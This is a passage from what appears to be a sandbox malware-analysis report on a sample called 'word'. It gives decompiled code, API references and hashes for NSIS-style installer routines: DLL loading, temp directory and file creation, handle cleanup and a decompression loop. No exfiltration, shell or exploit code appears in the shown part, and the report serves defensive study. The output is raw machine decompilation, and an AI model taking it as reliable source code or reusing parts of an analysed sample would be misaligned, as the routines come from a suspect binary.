                                      				signed int _t19;
                                      				void* _t24;
                                      
                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                      				if(_t13 > 0x104) {
                                      					_t13 = 0;
                                      				}
                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                      					_t19 = 1;
                                      				} else {
                                      					_t19 = 0;
                                      				}
                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                      				return _t17;
                                      			}








                                      0x004069dc
                                      0x004069e5
                                      0x004069e7
                                      0x004069e7
                                      0x004069eb
                                      0x004069fe
                                      0x004069f8
                                      0x004069f8
                                      0x004069f8
                                      0x00406a17
                                      0x00406a2b
                                      0x00406a32

                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                      • wsprintfW.USER32 ref: 00406A17
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%S.dll$UXTHEME$\
                                      • API String ID: 2200240437-1946221925
                                      • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                      • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                      • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                      • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                      C-Code - Quality: 100%
                                      			E00405B99(WCHAR* _a4) {
                                      				struct _SECURITY_ATTRIBUTES _v16;
                                      				struct _SECURITY_DESCRIPTOR _v36;
                                      				int _t22;
                                      				long _t23;
                                      
                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                      				_v36.Owner = 0x4083f8;
                                      				_v36.Group = 0x4083f8;
                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                      				_v16.lpSecurityDescriptor =  &_v36;
                                      				_v36.Revision = 1;
                                      				_v36.Control = 4;
                                      				_v36.Dacl = 0x4083e8;
                                      				_v16.nLength = 0xc;
                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                      				if(_t22 != 0) {
                                      					L1:
                                      					return 0;
                                      				}
                                      				_t23 = GetLastError();
                                      				if(_t23 == 0xb7) {
                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                      						goto L1;
                                      					}
                                      					return GetLastError();
                                      				}
                                      				return _t23;
                                      			}







                                      0x00405ba4
                                      0x00405ba8
                                      0x00405bab
                                      0x00405bb1
                                      0x00405bb5
                                      0x00405bb9
                                      0x00405bc1
                                      0x00405bc8
                                      0x00405bce
                                      0x00405bd5
                                      0x00405bdc
                                      0x00405be4
                                      0x00405be6
                                      0x00000000
                                      0x00405be6
                                      0x00405bf0
                                      0x00405bf7
                                      0x00405c0d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405c0f
                                      0x00405c13

                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                      • GetLastError.KERNEL32 ref: 00405BF0
                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                      • GetLastError.KERNEL32 ref: 00405C0F
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 3449924974-4017390910
                                      • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                      • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                      • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                      • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 538 403479-4034a1 GetTickCount 539 4035d1-4035d9 call 40302e 538->539 540 4034a7-4034d2 call 4035f8 SetFilePointer 538->540 545 4035db-4035df 539->545 546 4034d7-4034e9 540->546 547 4034eb 546->547 548 4034ed-4034fb call 4035e2 546->548 547->548 551 403501-40350d 548->551 552 4035c3-4035c6 548->552 553 403513-403519 551->553 552->545 554 403544-403560 call 406bb0 553->554 555 40351b-403521 553->555 561 403562-40356a 554->561 562 4035cc 554->562 555->554 556 403523-403543 call 40302e 555->556 556->554 564 40356c-403574 call 40620a 561->564 565 40358d-403593 561->565 563 4035ce-4035cf 562->563 563->545 569 403579-40357b 564->569 565->562 566 403595-403597 565->566 566->562 568 403599-4035ac 566->568 568->546 570 4035b2-4035c1 SetFilePointer 568->570 571 4035c8-4035ca 569->571 572 40357d-403589 569->572 570->539 571->563 572->553 573 40358b 572->573 573->568
                                      C-Code - Quality: 93%
                                      			E00403479(intOrPtr _a4) {
                                      				intOrPtr _t11;
                                      				signed int _t12;
                                      				void* _t14;
                                      				void* _t15;
                                      				long _t16;
                                      				void* _t18;
                                      				intOrPtr _t31;
                                      				intOrPtr _t34;
                                      				intOrPtr _t36;
                                      				void* _t37;
                                      				intOrPtr _t49;
                                      
                                      				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                      				 *0x42a26c = GetTickCount() + 0x1f4;
                                      				if(_t34 <= 0) {
                                      					L22:
                                      					E0040302E(1);
                                      					return 0;
                                      				}
                                      				E004035F8( *0x420f04);
                                      				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                      				 *0x420f00 = _t34;
                                      				 *0x420ef0 = 0;
                                      				while(1) {
                                      					_t31 = 0x4000;
                                      					_t11 =  *0x420ef8 -  *0x420f04;
                                      					if(_t11 <= 0x4000) {
                                      						_t31 = _t11;
                                      					}
                                      					_t12 = E004035E2(0x414ef0, _t31);
                                      					if(_t12 == 0) {
                                      						break;
                                      					}
                                      					 *0x420f04 =  *0x420f04 + _t31;
                                      					 *0x40ce80 = 0x414ef0;
                                      					 *0x40ce84 = _t31;
                                      					L6:
                                      					L6:
                                      					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                      						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                      						E0040302E(0);
                                      					}
                                      					 *0x40ce88 = 0x40cef0;
                                      					 *0x40ce8c = 0x8000; // executed
                                      					_t14 = E00406BB0(0x40ce68); // executed
                                      					if(_t14 < 0) {
                                      						goto L20;
                                      					}
                                      					_t36 =  *0x40ce88; // 0x41255b
                                      					_t37 = _t36 - 0x40cef0;
                                      					if(_t37 == 0) {
                                      						__eflags =  *0x40ce84; // 0x0
                                      						if(__eflags != 0) {
                                      							goto L20;
                                      						}
                                      						__eflags = _t31;
                                      						if(_t31 == 0) {
                                      							goto L20;
                                      						}
                                      						L16:
                                      						_t16 =  *0x420ef4;
                                      						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                      							continue;
                                      						}
                                      						SetFilePointer( *0x40a01c, _t16, 0, 0);
                                      						goto L22;
                                      					}
                                      					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                      					if(_t18 == 0) {
                                      						_push(0xfffffffe);
                                      						L21:
                                      						_pop(_t15);
                                      						return _t15;
                                      					}
                                      					 *0x40ce60 =  *0x40ce60 + _t37;
                                      					_t49 =  *0x40ce84; // 0x0
                                      					if(_t49 != 0) {
                                      						goto L6;
                                      					}
                                      					goto L16;
                                      					L20:
                                      					_push(0xfffffffd);
                                      					goto L21;
                                      				}
                                      				return _t12 | 0xffffffff;
                                      			}














                                      0x00403489
                                      0x0040349c
                                      0x004034a1
                                      0x004035d1
                                      0x004035d3
                                      0x00000000
                                      0x004035d9
                                      0x004034ad
                                      0x004034c0
                                      0x004034c6
                                      0x004034cc
                                      0x004034d7
                                      0x004034dc
                                      0x004034e1
                                      0x004034e9
                                      0x004034eb
                                      0x004034eb
                                      0x004034f4
                                      0x004034fb
                                      0x00000000
                                      0x00000000
                                      0x00403501
                                      0x00403507
                                      0x0040350d
                                      0x00000000
                                      0x00403513
                                      0x00403519
                                      0x00403539
                                      0x0040353e
                                      0x00403543
                                      0x00403549
                                      0x0040354f
                                      0x00403559
                                      0x00403560
                                      0x00000000
                                      0x00000000
                                      0x00403562
                                      0x00403568
                                      0x0040356a
                                      0x0040358d
                                      0x00403593
                                      0x00000000
                                      0x00000000
                                      0x00403595
                                      0x00403597
                                      0x00000000
                                      0x00000000
                                      0x00403599
                                      0x00403599
                                      0x004035ac
                                      0x00000000
                                      0x00000000
                                      0x004035bb
                                      0x00000000
                                      0x004035bb
                                      0x00403574
                                      0x0040357b
                                      0x004035c8
                                      0x004035ce
                                      0x004035ce
                                      0x00000000
                                      0x004035ce
                                      0x0040357d
                                      0x00403583
                                      0x00403589
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004035cc
                                      0x004035cc
                                      0x00000000
                                      0x004035cc
                                      0x00000000

                                      APIs
                                      • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 0040348D
                                        • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FilePointer$CountTick
                                      • String ID: [%A
                                      • API String ID: 1092082344-1988147618
                                      • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                      • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                      • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                      • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 574 406187-406193 575 406194-4061c8 GetTickCount GetTempFileNameW 574->575 576 4061d7-4061d9 575->576 577 4061ca-4061cc 575->577 579 4061d1-4061d4 576->579 577->575 578 4061ce 577->578 578->579
                                      C-Code - Quality: 100%
                                      			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                      				intOrPtr _v8;
                                      				short _v12;
                                      				short _t12;
                                      				intOrPtr _t13;
                                      				signed int _t14;
                                      				WCHAR* _t17;
                                      				signed int _t19;
                                      				signed short _t23;
                                      				WCHAR* _t26;
                                      
                                      				_t26 = _a4;
                                      				_t23 = 0x64;
                                      				while(1) {
                                      					_t12 =  *L"nsa"; // 0x73006e
                                      					_t23 = _t23 - 1;
                                      					_v12 = _t12;
                                      					_t13 =  *0x40a5ac; // 0x61
                                      					_v8 = _t13;
                                      					_t14 = GetTickCount();
                                      					_t19 = 0x1a;
                                      					_v8 = _v8 + _t14 % _t19;
                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                      					if(_t17 != 0) {
                                      						break;
                                      					}
                                      					if(_t23 != 0) {
                                      						continue;
                                      					} else {
                                      						 *_t26 =  *_t26 & _t23;
                                      					}
                                      					L4:
                                      					return _t17;
                                      				}
                                      				_t17 = _t26;
                                      				goto L4;
                                      			}












                                      0x0040618d
                                      0x00406193
                                      0x00406194
                                      0x00406194
                                      0x00406199
                                      0x0040619a
                                      0x0040619d
                                      0x004061a2
                                      0x004061a5
                                      0x004061af
                                      0x004061bc
                                      0x004061c0
                                      0x004061c8
                                      0x00000000
                                      0x00000000
                                      0x004061cc
                                      0x00000000
                                      0x004061ce
                                      0x004061ce
                                      0x004061ce
                                      0x004061d1
                                      0x004061d4
                                      0x004061d4
                                      0x004061d7
                                      0x00000000

                                      APIs
                                      • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061A5
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-4262883142
                                      • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                      • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                      • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                      • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 580 403c25-403c34 581 403c40-403c48 580->581 582 403c36-403c39 CloseHandle 580->582 583 403c54-403c60 call 403c82 call 405d74 581->583 584 403c4a-403c4d CloseHandle 581->584 582->581 588 403c65-403c66 583->588 584->583
                                      C-Code - Quality: 100%
                                      			E00403C25() {
                                      				void* _t1;
                                      				void* _t2;
                                      				void* _t4;
                                      				signed int _t11;
                                      
                                      				_t1 =  *0x40a018; // 0xffffffff
                                      				if(_t1 != 0xffffffff) {
                                      					CloseHandle(_t1); // executed
                                      					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                      				}
                                      				_t2 =  *0x40a01c; // 0xffffffff
                                      				if(_t2 != 0xffffffff) {
                                      					CloseHandle(_t2);
                                      					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                      					_t11 =  *0x40a01c;
                                      				}
                                      				E00403C82();
                                      				_t4 = E00405D74(_t11, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\nsv4185.tmp\\", 7); // executed
                                      				return _t4;
                                      			}







                                      0x00403c25
                                      0x00403c34
                                      0x00403c37
                                      0x00403c39
                                      0x00403c39
                                      0x00403c40
                                      0x00403c48
                                      0x00403c4b
                                      0x00403c4d
                                      0x00403c4d
                                      0x00403c4d
                                      0x00403c54
                                      0x00403c60
                                      0x00403c66

                                      APIs
                                      • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403C37
                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403C4B
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\nsv4185.tmp\, xrefs: 00403C5B
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv4185.tmp\
                                      • API String ID: 2962429428-1424609608
                                      • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                      • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                      • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                      • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 672 40603f-40605a call 406668 call 405fe2 677 406060-40606d call 4068ef 672->677 678 40605c-40605e 672->678 682 40607d-406081 677->682 683 40606f-406075 677->683 679 4060b8-4060ba 678->679 685 406097-4060a0 lstrlenW 682->685 683->678 684 406077-40607b 683->684 684->678 684->682 686 4060a2-4060b6 call 405f37 GetFileAttributesW 685->686 687 406083-40608a call 40699e 685->687 686->679 692 406091-406092 call 405f83 687->692 693 40608c-40608f 687->693 692->685 693->678 693->692
                                      C-Code - Quality: 53%
                                      			E0040603F(void* __eflags, intOrPtr _a4) {
                                      				int _t11;
                                      				signed char* _t12;
                                      				long _t16;
                                      				intOrPtr _t18;
                                      				intOrPtr* _t21;
                                      				signed int _t23;
                                      
                                      				E00406668(0x425f50, _a4);
                                      				_t21 = E00405FE2(0x425f50);
                                      				if(_t21 != 0) {
                                      					E004068EF(_t21);
                                      					if(( *0x42a278 & 0x00000080) == 0) {
                                      						L5:
                                      						_t23 = _t21 - 0x425f50 >> 1;
                                      						while(1) {
                                      							_t11 = lstrlenW(0x425f50);
                                      							_push(0x425f50);
                                      							if(_t11 <= _t23) {
                                      								break;
                                      							}
                                      							_t12 = E0040699E();
                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                      								E00405F83(0x425f50);
                                      								continue;
                                      							} else {
                                      								goto L1;
                                      							}
                                      						}
                                      						E00405F37();
                                      						_t16 = GetFileAttributesW(??); // executed
                                      						return 0 | _t16 != 0xffffffff;
                                      					}
                                      					_t18 =  *_t21;
                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                      						goto L1;
                                      					} else {
                                      						goto L5;
                                      					}
                                      				}
                                      				L1:
                                      				return 0;
                                      			}









                                      0x0040604b
                                      0x00406056
                                      0x0040605a
                                      0x00406061
                                      0x0040606d
                                      0x0040607d
                                      0x0040607f
                                      0x00406097
                                      0x00406098
                                      0x0040609f
                                      0x004060a0
                                      0x00000000
                                      0x00000000
                                      0x00406083
                                      0x0040608a
                                      0x00406092
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040608a
                                      0x004060a2
                                      0x004060a8
                                      0x00000000
                                      0x004060b6
                                      0x0040606f
                                      0x00406075
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406075
                                      0x0040605c
                                      0x00000000

                                      APIs
                                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                        • Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                      • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0,00000000), ref: 00406098
                                      • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004060A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: P_B
                                      • API String ID: 3248276644-906794629
                                      • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                      • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                      • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                      • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 695 407194-40719a 696 40719c-40719e 695->696 697 40719f-4071bd 695->697 696->697 698 407490-40749d 697->698 699 4073cb-4073e0 697->699 702 4074c7-4074cb 698->702 700 4073e2-4073f8 699->700 701 4073fa-407410 699->701 703 407413-40741a 700->703 701->703 704 40752b-40753e 702->704 705 4074cd-4074ee 702->705 706 407441 703->706 707 40741c-407420 703->707 710 407447-40744d 704->710 708 4074f0-407505 705->708 709 407507-40751a 705->709 706->710 711 407426-40743e 707->711 712 4075cf-4075d9 707->712 713 40751d-407524 708->713 709->713 715 406bf2 710->715 716 4075fa 710->716 711->706 717 4075e5-4075f8 712->717 718 4074c4 713->718 719 407526 713->719 720 406bf9-406bfd 715->720 721 406d39-406d5a 715->721 722 406c9e-406ca2 715->722 723 406d0e-406d12 715->723 725 4075fd-407601 716->725 717->725 718->702 726 4074a9-4074c1 719->726 727 4075db 719->727 720->717 728 406c03-406c10 720->728 721->699 731 406ca8-406cc1 722->731 732 40754e-407558 722->732 729 406d18-406d2c 723->729 730 40755d-407567 723->730 726->718 727->717 728->716 733 406c16-406c5c 728->733 734 406d2f-406d37 729->734 730->717 735 406cc4-406cc8 731->735 732->717 736 406c84-406c86 733->736 737 406c5e-406c62 733->737 734->721 734->723 735->722 738 406cca-406cd0 735->738 743 406c94-406c9c 736->743 744 406c88-406c92 736->744 741 406c64-406c67 GlobalFree 737->741 742 406c6d-406c7b GlobalAlloc 737->742 739 406cd2-406cd9 738->739 740 406cfa-406d0c 738->740 745 406ce4-406cf4 GlobalAlloc 739->745 746 406cdb-406cde GlobalFree 739->746 740->734 741->742 742->716 747 406c81 742->747 743->735 744->743 744->744 745->716 745->740 746->745 747->736
                                      C-Code - Quality: 99%
                                      			E00407194() {
                                      				signed int _t530;
                                      				void _t537;
                                      				signed int _t538;
                                      				signed int _t539;
                                      				unsigned short _t569;
                                      				signed int _t579;
                                      				signed int _t607;
                                      				void* _t627;
                                      				signed int _t628;
                                      				signed int _t635;
                                      				signed int* _t643;
                                      				void* _t644;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					_t530 =  *(_t644 - 0x30);
                                      					if(_t530 >= 4) {
                                      					}
                                      					 *(_t644 - 0x40) = 6;
                                      					 *(_t644 - 0x7c) = 0x19;
                                      					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                      					while(1) {
                                      						L145:
